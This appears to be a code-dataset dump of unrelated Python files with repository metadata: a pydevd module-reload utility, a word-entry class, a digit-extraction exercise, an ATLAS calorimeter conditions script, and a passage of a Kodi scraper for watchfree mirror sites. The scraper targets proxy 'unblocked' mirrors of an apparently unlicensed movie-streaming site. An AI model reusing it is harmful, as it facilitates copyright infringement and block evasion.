- Code using metaclasses may not always work.
- Functions and methods using decorators (other than classmethod and staticmethod) are not handled
correctly.
- Renamings are not handled correctly.
- Dependent modules are not reloaded.
- New __slots__ can't be added to existing classes.
Info
======================
Original: http://svn.python.org/projects/sandbox/trunk/xreload/xreload.py
Note: it seems https://github.com/plone/plone.reload/blob/master/plone/reload/xreload.py enhances it (to check later)
Interesting alternative: https://code.google.com/p/reimport/
Alternative to reload().
This works by executing the module in a scratch namespace, and then patching classes, methods and
functions in place. This avoids the need to patch instances. New objects are copied into the
target namespace.
"""
from _pydev_bundle.pydev_imports import execfile
from _pydevd_bundle import pydevd_dont_trace
import types
from _pydev_bundle import pydev_log
from _pydevd_bundle.pydevd_constants import get_global_debugger
NO_DEBUG = 0
LEVEL1 = 1
LEVEL2 = 2
DEBUG = NO_DEBUG
def write_err(*args):
    """Forward a 'code reload:' I/O message through the active debugger, if any."""
    py_db = get_global_debugger()
    if py_db is None:
        return
    text = ' '.join(str(part) for part in args)
    cmd = py_db.cmd_factory.make_io_message('code reload: %s\n' % (text,), 2)
    if py_db.writer is not None:
        py_db.writer.add_command(cmd)
def notify_info0(*args):
    # Level-0 notification: always forwarded, regardless of DEBUG.
    write_err(*args)
def notify_info(*args):
    # Forwarded only when DEBUG is at least LEVEL1.
    if DEBUG >= LEVEL1:
        write_err(*args)
def notify_info2(*args):
    # Forwarded only when DEBUG is at least LEVEL2 (most verbose).
    if DEBUG >= LEVEL2:
        write_err(*args)
def notify_error(*args):
    # Errors are always forwarded, like level-0 notifications.
    write_err(*args)
#=======================================================================================================================
# code_objects_equal
#=======================================================================================================================
def code_objects_equal(code0, code1):
    """Compare two code objects for equality, ignoring private attributes,
    anything line-number related and newer non-data helpers (`replace`,
    `co_positions`, `co_qualname`)."""
    ignored = ('replace', 'co_positions', 'co_qualname')
    def _relevant(attr):
        return not (attr.startswith('_') or 'line' in attr or attr in ignored)
    return all(getattr(code0, attr) == getattr(code1, attr)
               for attr in dir(code0) if _relevant(attr))
#=======================================================================================================================
# xreload
#=======================================================================================================================
def xreload(mod):
    """Reload a module in place, updating classes, methods and functions.

    mod: a module object

    Returns a boolean indicating whether a change was done.
    """
    reloader = Reload(mod)
    reloader.apply()
    changed = reloader.found_change
    reloader = None  # drop the reference before clearing the trace cache
    pydevd_dont_trace.clear_trace_filter_cache()
    return changed
# This isn't actually used... Initially I planned to reload variables which are immutable on the
# namespace, but this can destroy places where we're saving state, which may not be what we want,
# so, we're being conservative and giving the user hooks if he wants to do a reload.
#
# immutable_types = [int, str, float, tuple] #That should be common to all Python versions
#
# for name in 'long basestr unicode frozenset'.split():
# try:
# immutable_types.append(__builtins__[name])
# except:
# pass #Just ignore: not all python versions are created equal.
# immutable_types = tuple(immutable_types)
#=======================================================================================================================
# Reload
#=======================================================================================================================
class Reload:
    """Performs one in-place reload of `mod`: re-executes its file in a
    scratch namespace, then patches the live module namespace so existing
    references (instances, singletons) keep working."""
    def __init__(self, mod, mod_name=None, mod_filename=None):
        self.mod = mod
        if mod_name:
            self.mod_name = mod_name
        else:
            self.mod_name = mod.__name__ if mod is not None else None
        if mod_filename:
            self.mod_filename = mod_filename
        else:
            self.mod_filename = mod.__file__ if mod is not None else None
        # Flipped to True by apply()/_update() when anything actually changed.
        self.found_change = False
    def apply(self):
        """Execute the module's file in a fresh namespace and merge the result
        into the live module namespace, updating what can be updated in place."""
        mod = self.mod
        self._on_finish_callbacks = []
        try:
            # Get the module namespace (dict) early; this is part of the type check
            modns = mod.__dict__
            # Execute the code. We copy the module dict to a temporary; then
            # clear the module dict; then execute the new code in the module
            # dict; then swap things back and around. This trick (due to
            # Glyph Lefkowitz) ensures that the (readonly) __globals__
            # attribute of methods and functions is set to the correct dict
            # object.
            new_namespace = modns.copy()
            new_namespace.clear()
            if self.mod_filename:
                new_namespace["__file__"] = self.mod_filename
                try:
                    new_namespace["__builtins__"] = __builtins__
                except NameError:
                    raise  # Ok if not there.
            if self.mod_name:
                new_namespace["__name__"] = self.mod_name
                if new_namespace["__name__"] == '__main__':
                    # We do this because usually the __main__ starts-up the program, guarded by
                    # the if __name__ == '__main__', but we don't want to start the program again
                    # on a reload.
                    new_namespace["__name__"] = '__main_reloaded__'
            execfile(self.mod_filename, new_namespace, new_namespace)
            # Now we get to the hard part
            oldnames = set(modns)
            newnames = set(new_namespace)
            # Create new tokens (note: not deleting existing)
            for name in newnames - oldnames:
                notify_info0('Added:', name, 'to namespace')
                self.found_change = True
                modns[name] = new_namespace[name]
            # Update in-place what we can
            for name in oldnames & newnames:
                self._update(modns, name, modns[name], new_namespace[name])
            self._handle_namespace(modns)
            # Fire the module-level __xreload_after_reload_update__ hooks.
            for c in self._on_finish_callbacks:
                c()
            del self._on_finish_callbacks[:]
        except:
            pydev_log.exception()
    def _handle_namespace(self, namespace, is_class_namespace=False):
        """Queue the namespace's __xreload_after_reload_update__ hook (if any)
        to run once the whole reload has finished."""
        on_finish = None
        if is_class_namespace:
            xreload_after_update = getattr(namespace, '__xreload_after_reload_update__', None)
            if xreload_after_update is not None:
                self.found_change = True
                on_finish = lambda: xreload_after_update()
        elif '__xreload_after_reload_update__' in namespace:
            xreload_after_update = namespace['__xreload_after_reload_update__']
            self.found_change = True
            on_finish = lambda: xreload_after_update(namespace)
        if on_finish is not None:
            # If a client wants to know about it, give him a chance.
            self._on_finish_callbacks.append(on_finish)
    def _update(self, namespace, name, oldobj, newobj, is_class_namespace=False):
        """Update oldobj, if possible in place, with newobj.
        If oldobj is immutable, this simply returns newobj.
        Args:
          oldobj: the object to be updated
          newobj: the object used as the source for the update
        """
        try:
            notify_info2('Updating: ', oldobj)
            if oldobj is newobj:
                # Probably something imported
                return
            if type(oldobj) is not type(newobj):
                # Cop-out: if the type changed, give up
                if name not in ('__builtins__',):
                    notify_error('Type of: %s (old: %s != new: %s) changed... Skipping.' % (name, type(oldobj), type(newobj)))
                return
            if isinstance(newobj, types.FunctionType):
                self._update_function(oldobj, newobj)
                return
            if isinstance(newobj, types.MethodType):
                self._update_method(oldobj, newobj)
                return
            if isinstance(newobj, classmethod):
                self._update_classmethod(oldobj, newobj)
                return
            if isinstance(newobj, staticmethod):
                self._update_staticmethod(oldobj, newobj)
                return
            if hasattr(types, 'ClassType'):
                # Python 2: old-style classes exist alongside new-style ones.
                classtype = (types.ClassType, type)  # object is not instance of types.ClassType.
            else:
                classtype = type
            if isinstance(newobj, classtype):
                self._update_class(oldobj, newobj)
                return
            # New: dealing with metaclasses.
            if hasattr(newobj, '__metaclass__') and hasattr(newobj, '__class__') and newobj.__metaclass__ == newobj.__class__:
                self._update_class(oldobj, newobj)
                return
            if namespace is not None:
                # Check for the `__xreload_old_new__` protocol (don't even compare things
                # as even doing a comparison may break things -- see: https://github.com/microsoft/debugpy/issues/615).
                xreload_old_new = None
                if is_class_namespace:
                    xreload_old_new = getattr(namespace, '__xreload_old_new__', None)
                    if xreload_old_new is not None:
                        self.found_change = True
                        xreload_old_new(name, oldobj, newobj)
                elif '__xreload_old_new__' in namespace:
                    xreload_old_new = namespace['__xreload_old_new__']
                    xreload_old_new(namespace, name, oldobj, newobj)
                    self.found_change = True
                # Too much information to the user...
                # else:
                #     notify_info0('%s NOT updated. Create __xreload_old_new__(name, old, new) for custom reload' % (name,))
        except:
            notify_error('Exception found when updating %s. Proceeding for other items.' % (name,))
            pydev_log.exception()
    # All of the following functions have the same signature as _update()
    def _update_function(self, oldfunc, newfunc):
        """Update a function object."""
        oldfunc.__doc__ = newfunc.__doc__
        oldfunc.__dict__.update(newfunc.__dict__)
        try:
            # Prefer the py3 attribute name; fall back to py2's func_code.
            newfunc.__code__
            attr_name = '__code__'
        except AttributeError:
            newfunc.func_code
            attr_name = 'func_code'
        old_code = getattr(oldfunc, attr_name)
        new_code = getattr(newfunc, attr_name)
        if not code_objects_equal(old_code, new_code):
            notify_info0('Updated function code:', oldfunc)
            setattr(oldfunc, attr_name, new_code)
            self.found_change = True
        try:
            oldfunc.__defaults__ = newfunc.__defaults__
        except AttributeError:
            oldfunc.func_defaults = newfunc.func_defaults
        return oldfunc
    def _update_method(self, oldmeth, newmeth):
        """Update a method object."""
        # XXX What if im_func is not a function?
        if hasattr(oldmeth, 'im_func') and hasattr(newmeth, 'im_func'):
            self._update(None, None, oldmeth.im_func, newmeth.im_func)
        elif hasattr(oldmeth, '__func__') and hasattr(newmeth, '__func__'):
            self._update(None, None, oldmeth.__func__, newmeth.__func__)
        return oldmeth
    def _update_class(self, oldclass, newclass):
        """Update a class object."""
        olddict = oldclass.__dict__
        newdict = newclass.__dict__
        oldnames = set(olddict)
        newnames = set(newdict)
        for name in newnames - oldnames:
            setattr(oldclass, name, newdict[name])
            notify_info0('Added:', name, 'to', oldclass)
            self.found_change = True
        # Note: not removing old things...
        # for name in oldnames - newnames:
        #     notify_info('Removed:', name, 'from', oldclass)
        #     delattr(oldclass, name)
        for name in (oldnames & newnames) - set(['__dict__', '__doc__']):
            self._update(oldclass, name, olddict[name], newdict[name], is_class_namespace=True)
        old_bases = getattr(oldclass, '__bases__', None)
        new_bases = getattr(newclass, '__bases__', None)
        if str(old_bases) != str(new_bases):
            notify_error('Changing the hierarchy of a class is not supported. %s may be inconsistent.' % (oldclass,))
        self._handle_namespace(oldclass, is_class_namespace=True)
    def _update_classmethod(self, oldcm, newcm):
        """Update a classmethod update."""
        # While we can't modify the classmethod object itself (it has no
        # mutable attributes), we *can* extract the underlying function
        # (by calling __get__(), which returns a method object) and update
        # it in-place. We don't have the class available to pass to
        # __get__() but any object except None will do.
        self._update(None, None, oldcm.__get__(0), newcm.__get__(0))
    def _update_staticmethod(self, oldsm, newsm):
        """Update a staticmethod update."""
        # While we can't modify the staticmethod object itself (it has no
        # mutable attributes), we *can* extract the underlying function
        # (by calling __get__(), which returns it) and update it in-place.
        # We don't have the class available to pass to __get__() but any
        # object except None will do.
        self._update(None, None, oldsm.__get__(0), newsm.__get__(0))
| [
"[email protected]"
] | |
77e3a3bf9a976c804784f6bbc248d5188678a70b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_fawn.py | 260afb89b3b0bae13a38db08457adb7aad8566e8 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py |
#calss header
class _FAWN():
    """Auto-generated lexical entry for the noun 'FAWN'."""
    def __init__(self):
        self.name = "FAWN"
        self.definitions = [u'a young deer', u'a pale yellowish-brown colour']
        self.parents = []
        self.childen = []  # sic: attribute name kept as-is for compatibility with readers
        self.properties = []
        self.jsondata = {}
        self.specie = 'nouns'
    def run(self, obj1=None, obj2=None):
        """Return the entry's JSON payload.

        obj1/obj2 are accepted for interface compatibility but unused.
        Defaults changed from mutable [] (one shared list across every call
        and instance) to None, which is safe and behaviorally equivalent
        here since the arguments are never touched.
        """
        return self.jsondata
| [
"[email protected]"
] | |
8f45cff222fbcf136ef6cdd1fe4f7f7808ae38d0 | 61e698839a4a355a26023542c3c277fa72a52387 | /ZJU-Python/CH3/ch3-5.py | 3ea059aa708f84d52ddd63ec89c09e3ff02ecce1 | [] | no_license | JiahuiQiu/Python-Learning | b51fd224bf3228b858d7dc5db76fd8852ebbee4a | 9d704e51e2e9f3121117e9170e840e1df4879e0e | refs/heads/master | 2021-04-16T18:11:37.903225 | 2021-02-11T06:38:10 | 2021-02-11T06:38:10 | 249,374,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | # -*- coding: utf-8 -*-
"""
字符转换
本题要求提取一个字符串中的所有数字字符('0'……'9'),将其转换为一个整数输出。
输入格式:
输入在一行中给出一个不超过80个字符且以回车结束的字符串。
输出格式:
在一行中输出转换后的整数。题目保证输出不超过长整型范围。
输入样例:
free82jeep5
输出样例:
825
"""
# Extract all digit characters ('0'..'9') from one input line and print the
# resulting integer (PAT exercise: 字符转换 -> character conversion).
a = input()
s2 = "0123456789"
# Membership test against s2 (not str.isdigit) keeps the original semantics
# of accepting ASCII digits only.
s1 = "".join(ch for ch in a if ch in s2)
# Bug fix: int("") raised ValueError when the line contained no digits;
# print 0 in that case instead of crashing.
print(int(s1) if s1 else 0)
| [
"[email protected]"
] | |
6af689639ddfcb358242510a287fa6c89aca2e3a | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArCalibTools/share/LArMCConditions2Ntuple.py | 1a35ffa4835cfb273b6320e18243c2bfdc57f847 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,483 | py | import AthenaCommon.AtlasUnixGeneratorJob #use MC event selector
from string import split,join          # Python 2 string functions
## get a handle to the default top-level algorithm sequence
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
#Input Parameters:
# PoolFiles: sequence of pool files to read from though CondProxyProvider
# if not given, read from COOL
#
# RunNumber: Input to COOL IOV-DB if reading from
#
# RootFile: root file for the ntuple
#
# Objects: List of objects written to ntuple (PEDESTAL OFC, RAMP,
# Each parameter below may be pre-set by the caller (athena -c / include);
# the 'in dir()' checks only install a default when it is absent.
DBTag='OFLCOND-SDR-BS14T-IBL-06'
if not 'InputDB' in dir():
    InputDB="COOLOFL_LAR/OFLP200"
if not "OFCFolder" in dir():
    OFCFolder="5samples1phase"
if not 'RunNumber' in dir():
    RunNumber=2147483647
if not "RootFile" in dir():
    RootFile="LArConditions.root"
if not "Objects" in dir():
    Objects=["PEDESTAL","RAMP","OFC","MPHYSOVERMCAL","SHAPE","UA2MEV"]
# NOTE(review): DBTag is assigned unconditionally above, so this default
# branch can never fire -- confirm which tag is actually intended.
if not "DBTag" in dir():
    DBTag="LARCALIB-000-01"
def doObj(objName):
    """Return True if *objName* is a case-insensitive substring of any entry
    in the requested ``Objects`` list, False otherwise.

    Rewritten with any(); the repeated objName.upper() is hoisted out of
    the loop.  Behaviour is unchanged.
    """
    wanted = objName.upper()
    return any(wanted in o.upper() for o in Objects)
def getDBFolderAndTag(folder):
    """Build the COOL folder specifier '<db>...</db><folder>[<tag>...</tag>]'.

    Bug fix: inside a function, dir() returns only the *local* namespace, so
    the original ``"TagSuffix" in dir()`` test was always False and the tag
    was silently dropped; check the module globals instead.  Also replaces
    the Python-2-only ``join(split(folder, '/'), '')`` with str.replace.
    """
    if "TagSuffix" in globals():
        # Tag name is the folder with '/' removed plus the suffix,
        # e.g. /LAR/X/Y + '-00' -> LARXY-00
        tag = "<tag>" + folder.replace('/', '') + TagSuffix + "</tag>"
    else:
        tag = ""
    return "<db>" + InputDB + "</db>" + folder + tag
# --- Global job configuration (Python 2 Athena jobOptions; svcMgr, conddb,
# --- topSequence, ToolSvc, theApp, include and DEBUG are framework-injected).
from AthenaCommon.GlobalFlags import globalflags
globalflags.DataSource="geant4"
globalflags.InputFormat="pool"
from AthenaCommon.JobProperties import jobproperties
jobproperties.Global.DetDescrVersion = "ATLAS-GEO-18-01-03"
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOff()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
#Set up GeoModel (not really needed but crashes without)
from AtlasGeoModel import SetGeometryVersion
from AtlasGeoModel import GeoModelInit
#Get identifier mapping (needed by LArConditionsContainer)
svcMgr.IOVDbSvc.GlobalTag=DBTag
include( "LArConditionsCommon/LArIdMap_comm_jobOptions.py" )
theApp.EvtMax = 1
svcMgr.EventSelector.RunNumber = RunNumber
# Bad-channel and identifier-mapping folders (fixed DB, not tag-suffixed).
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/BadChannels<key>/LAR/BadChannels/BadChannels</key>")
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/MissingFEBs<key>/LAR/BadChannels/MissingFEBs</key>")
conddb.addOverride('/LAR/Identifier/FebRodAtlas','FebRodAtlas-005')
conddb.addOverride('/LAR/Identifier/OnOffIdAtlas','OnOffIdAtlas-012')
# Optional: read conditions from POOL files instead of COOL.
if 'PoolFiles' in dir():
    from AthenaCommon.ConfigurableDb import getConfigurable
    from AthenaCommon.AppMgr import ServiceMgr
    ServiceMgr.ProxyProviderSvc.ProviderNames += [ "CondProxyProvider" ]
    ServiceMgr += getConfigurable( "CondProxyProvider" )()
    svcMgr.CondProxyProvider.InputCollections=PoolFiles
if 'PoolCat' in dir():
    svcMgr.PoolSvc.ReadCatalog+=["xmlcatalog_file:"+PoolCat]
loadCastorCat=False
# --- One ntuple-dumper algorithm per requested object type (see Objects). ---
if doObj("PEDESTAL"):
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Pedestal"))
    from LArCalibTools.LArCalibToolsConf import LArPedestals2Ntuple
    LArPedestals2Ntuple=LArPedestals2Ntuple("LArPedestals2Ntuple")
    LArPedestals2Ntuple.AddFEBTempInfo=False
    topSequence+=LArPedestals2Ntuple
if doObj("AUTOCORR"):
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibOfl/AutoCorrs/AutoCorr"))
    from LArCalibTools.LArCalibToolsConf import LArAutoCorr2Ntuple
    LArAutoCorr2Ntuple=LArAutoCorr2Ntuple("LArAutoCorr2Ntuple")
    LArAutoCorr2Ntuple.AddFEBTempInfo=False
    topSequence+=LArAutoCorr2Ntuple
if doObj("OFC"):
    # OFCs are computed on the fly from noise/autocorrelation via the OFC tool.
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/HVScaleCorr"))
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Noise"))
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/AutoCorr"))
    from LArRecUtils.LArADC2MeVToolDefault import LArADC2MeVToolDefault
    from LArRecUtils.LArAutoCorrNoiseToolDefault import LArAutoCorrNoiseToolDefault
    theLArADC2MeVToolDefault = LArADC2MeVToolDefault()
    ToolSvc += theLArADC2MeVToolDefault
    theLArAutoCorrNoiseToolDefault = LArAutoCorrNoiseToolDefault()
    theLArAutoCorrNoiseToolDefault.NSamples = 5
    ToolSvc += theLArAutoCorrNoiseToolDefault
    from LArRecUtils.LArOFCToolDefault import LArOFCToolDefault
    theOFCTool = LArOFCToolDefault()
    theOFCTool.Dump=True
    ToolSvc += theOFCTool
    from LArCalibTools.LArCalibToolsConf import LArOFC2Ntuple
    LArOFC2Ntuple = LArOFC2Ntuple("LArOFC2Ntuple")
    LArOFC2Ntuple.ContainerKey = "LArOFC"
    LArOFC2Ntuple.AddFEBTempInfo=False
    LArOFC2Ntuple.IsMC = True
    LArOFC2Ntuple.OFCTool = theOFCTool
    topSequence+=LArOFC2Ntuple
if (doObj("SHAPE")):
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Shape"))
    from LArCalibTools.LArCalibToolsConf import LArShape2Ntuple
    LArShape2Ntuple = LArShape2Ntuple("LArShape2Ntuple")
    LArShape2Ntuple.ContainerKey = "LArShape"
    LArShape2Ntuple.AddFEBTempInfo=False
    LArShape2Ntuple.IsMC = True
    topSequence+=LArShape2Ntuple
if doObj("RAMP"):
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Ramp"))
    from LArCalibTools.LArCalibToolsConf import LArRamps2Ntuple
    LArRamps2Ntuple=LArRamps2Ntuple("LArRamps2Ntuple")
    LArRamps2Ntuple.NtupleName = "RAMPS"
    LArRamps2Ntuple.RawRamp = False
    LArRamps2Ntuple.IsMC = True
    LArRamps2Ntuple.AddFEBTempInfo=False
    topSequence+=LArRamps2Ntuple
if (doObj("UA2MEV")):
    print 'DAC2uA check : ',getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA")
    print 'uA2MeV check : ',getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV")
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA"))
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV"))
    from LArCalibTools.LArCalibToolsConf import LAruA2MeV2Ntuple
    LAruA2MeV2Ntuple=LAruA2MeV2Ntuple("LAruA2MeV2Ntuple")
    LAruA2MeV2Ntuple.AddFEBTempInfo=False
    topSequence+=LAruA2MeV2Ntuple
if (doObj("MPHYSOVERMCAL")):
    conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/MphysOverMcal"))
    from LArCalibTools.LArCalibToolsConf import LArMphysOverMcal2Ntuple
    LArMphysOverMcal2Ntuple=LArMphysOverMcal2Ntuple("LArMphysOverMcal2Ntuple")
    LArMphysOverMcal2Ntuple.AddFEBTempInfo=False
    LArMphysOverMcal2Ntuple.IsMC=True
    topSequence+=LArMphysOverMcal2Ntuple
# loadCastorCat is hard-coded False above, so this branch is currently dead.
if loadCastorCat:
    svcMgr.PoolSvc.ReadCatalog += ['xmlcatalog_file:'+'/afs/cern.ch/atlas/conditions/poolcond/catalogue/poolcond/PoolCat_comcond_castor.xml']
# --- Ntuple output file setup. ---
theApp.HistogramPersistency = "ROOT"
from GaudiSvc.GaudiSvcConf import NTupleSvc
svcMgr += NTupleSvc()
svcMgr.NTupleSvc.Output = [ "FILE1 DATAFILE='"+RootFile+"' OPT='NEW'" ]
svcMgr.MessageSvc.OutputLevel = DEBUG
svcMgr.IOVDbSvc.DBInstance="OFLP200"
| [
"[email protected]"
] | |
ff99c5b38da07f2441b44b40a4551a011355c801 | df100f181d9564bc3641dfec45726ac1cc1b2325 | /剑指offer/33.第一个只出现一次的字符/code2.py | 53b3b23a1aa9e81810711f85bca9b99e7fa8d470 | [] | no_license | forthlsss/codeForInterview | 83efe7d5e0e9f150abae2d84f50829d99034dae1 | 10791dfc3c34f0a236a386fe9a91f46d725bded5 | refs/heads/master | 2020-12-03T12:32:51.071062 | 2020-01-14T06:49:48 | 2020-01-14T06:49:48 | 231,318,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | def FirstNotRepeatingChar(s):
# write code here
map = {}
for i in range(len(s)):
map[s[i]] = map.get(s[i], 0) + 1
for i in range(len(s)):
if map[s[i]] == 1:
return i
return -1
print(FirstNotRepeatingChar('abac'))
| [
"[email protected]"
] | |
15d7aecf4a95145f8bce53ba7959fd4e048a9fed | 72350cc086e70f93425640b823bc7461c7cbff46 | /WIDW3T2.py | bfc82776864276eb298abf4ed9d89527e41ad788 | [] | no_license | Faybeee/Session3-Homework | c1529bd4e482eebbc4e71ea34e0f32288838e25b | 2bee58f255bd2667ec78db6b237b302c33ced9f6 | refs/heads/main | 2023-02-21T03:40:39.822766 | 2021-01-24T12:40:46 | 2021-01-24T12:40:46 | 332,446,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | #Write a program to ask a student for their percentage mark and convert this to a grade.
#The conversion will be done in a function called mark_grade
#Ask the user for their target grade and print this with their mark
# If their target grade > exam grade display a suitable message
# If their target grade = exam grade display a suitable message
# If their target grade < exam grade display a suitable message
def mark_grade(permark):
    """Convert a percentage mark to a letter grade.

    90+ -> "A", 80-89 -> "B", 70-79 -> "C", 60-69 -> "D", 50-59 -> "E",
    below 50 -> "FAIL".  The elif chain makes the original's redundant
    upper-bound checks (e.g. ``permark < 90 and permark >= 80``) unnecessary.
    """
    if permark >= 90:
        return "A"
    elif permark >= 80:
        return "B"
    elif permark >= 70:
        return "C"
    elif permark >= 60:
        return "D"
    elif permark >= 50:
        return "E"
    else:
        return "FAIL"
def grade_mark(want, permark):
    """Compare the desired grade *want* ("A"-"E", case-insensitive) with the mark.

    Returns "achieved" when the mark falls inside the wanted grade's 10-point
    band, "exceeded" when it lands above the band ("A" has no upper bound, so
    it can only be achieved), "did not achieve" when it is below the band, and
    None for an unrecognised grade (same as the original's fall-through).

    Bug fix: the original "did not achieve" branches for grades B-E tested
    ``permark > threshold`` instead of ``permark < threshold``, so they could
    never match and the function silently returned None for marks below the
    target grade.
    """
    thresholds = {"A": 90, "B": 80, "C": 70, "D": 60, "E": 50}
    target = want.upper()
    floor = thresholds.get(target)
    if floor is None:
        return None  # unknown target grade, as before
    if permark < floor:
        return "did not achieve"
    if target == "A" or permark < floor + 10:
        return "achieved"
    return "exceeded"
# Interactive driver: ask for the target grade and the achieved mark, then
# report the computed grade and whether the target was met.
print("Hi, I'm here to calculate your grade!")
want = str(input("First though, what grade are you hoping for?"))
permark = int(input("What % mark did you get?"))
grade = mark_grade(int(permark))
wanted = grade_mark(want, permark)
# Bug fix: endit was unbound (NameError at the final print) whenever
# grade_mark returned None, e.g. for an unrecognised target grade; default
# to an empty closing remark instead.
endit = ""
if wanted == "achieved":
    endit = "Congratulations!"
elif wanted == "exceeded":
    endit = "OMG! CONGRATULATIONS! THAT IS EPIC!!!"
elif wanted == "did not achieve":
    endit = "Better luck next time!"
print("Your grade is", grade, "you", wanted, "the", want, "you wanted.", endit)
| [
"[email protected]"
] | |
95d13e0f751a416bc4b06580bcf2b908508684b6 | a1b8b807a389fd3971ac235e46032c0be4795ff1 | /Repo_Files/Zips/plugin.video.streamhub/resources/lib/sources/en/watchfree.py | 499eb10d07d5e83d78835d4d22adcf9be4794a51 | [] | no_license | sClarkeIsBack/StreamHub | 0cd5da4b3229592a4e2cf7ce3e857294c172aaba | 110983579645313b8b60eac08613435c033eb92d | refs/heads/master | 2020-05-23T09:09:54.898715 | 2020-02-29T12:15:32 | 2020-02-29T12:15:32 | 80,440,827 | 9 | 20 | null | 2017-10-04T07:32:52 | 2017-01-30T16:43:46 | Python | UTF-8 | Python | false | false | 8,483 | py | # -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import proxy
class source:
    """Scraper for the watchfree.* mirrors (Covenant/Exodus-style provider).

    Python 2 module: urllib.quote_plus and str.encode('utf-8') usage is
    py2-style.  The bare ``except:`` blocks are the provider framework's
    convention of returning None/partial results on any scrape failure.
    """
    def __init__(self):
        self.priority = 0
        self.language = ['en']
        self.domains = ['watchfree.to','watchfree.unblockall.org','www6-watchfree6-to.unblocked.lol']
        self.base_link = 'http://watchfree.unblockall.org'
        # NOTE(review): immediately overrides the line above; only the
        # second mirror is ever used.
        self.base_link = 'http://www6-watchfree6-to.unblocked.lol'
        self.moviesearch_link = '/?keyword=%s&search_section=1'
        self.tvsearch_link = '/?keyword=%s&search_section=2'
    def movie(self, imdb, title, localtitle, aliases, year):
        """Search for a movie and return its site-relative URL (or None)."""
        try:
            query = self.moviesearch_link % urllib.quote_plus(cleantitle.query(title))
            query = urlparse.urljoin(self.base_link, query)
            result = str(proxy.request(query, 'free movies'))
            # Pull a second result page when pagination markers are present.
            if 'page=2' in result or 'page%3D2' in result: result += str(proxy.request(query + '&page=2', 'free movies'))
            result = client.parseDOM(result, 'div', attrs = {'class': 'item'})
            title = 'watch' + cleantitle.get(title)
            # Accept the requested year plus/minus one.
            years = ['(%s)' % str(year), '(%s)' % str(int(year)+1), '(%s)' % str(int(year)-1)]
            result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in result]
            result = [(i[0][0], i[1][0]) for i in result if len(i[0]) > 0 and len(i[1]) > 0]
            result = [i for i in result if any(x in i[1] for x in years)]
            r = [(proxy.parse(i[0]), i[1]) for i in result]
            match = [i[0] for i in r if title == cleantitle.get(i[1]) and '(%s)' % str(year) in i[1]]
            match2 = [i[0] for i in r]
            match2 = [x for y,x in enumerate(match2) if x not in match2[:y]]
            if match2 == []: return
            # Exact title match wins; otherwise probe up to 5 candidate pages
            # for the expected IMDb id.
            for i in match2[:5]:
                try:
                    if len(match) > 0: url = match[0] ; break
                    r = proxy.request(urlparse.urljoin(self.base_link, i), 'free movies')
                    r = re.findall('(tt\d+)', r)
                    if imdb in r: url = i ; break
                except:
                    pass
            url = re.findall('(?://.+?|)(/.+)', url)[0]
            url = client.replaceHTMLCodes(url)
            url = url.encode('utf-8')
            return url
        except:
            return
    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
        """Search for a TV show and return its site-relative URL (or None)."""
        try:
            query = self.tvsearch_link % urllib.quote_plus(cleantitle.query(tvshowtitle))
            query = urlparse.urljoin(self.base_link, query)
            result = str(proxy.request(query, 'free movies'))
            if 'page=2' in result or 'page%3D2' in result: result += str(proxy.request(query + '&page=2', 'free movies'))
            result = client.parseDOM(result, 'div', attrs = {'class': 'item'})
            tvshowtitle = 'watch' + cleantitle.get(tvshowtitle)
            years = ['(%s)' % str(year), '(%s)' % str(int(year)+1), '(%s)' % str(int(year)-1)]
            result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in result]
            result = [(i[0][0], i[1][0]) for i in result if len(i[0]) > 0 and len(i[1]) > 0]
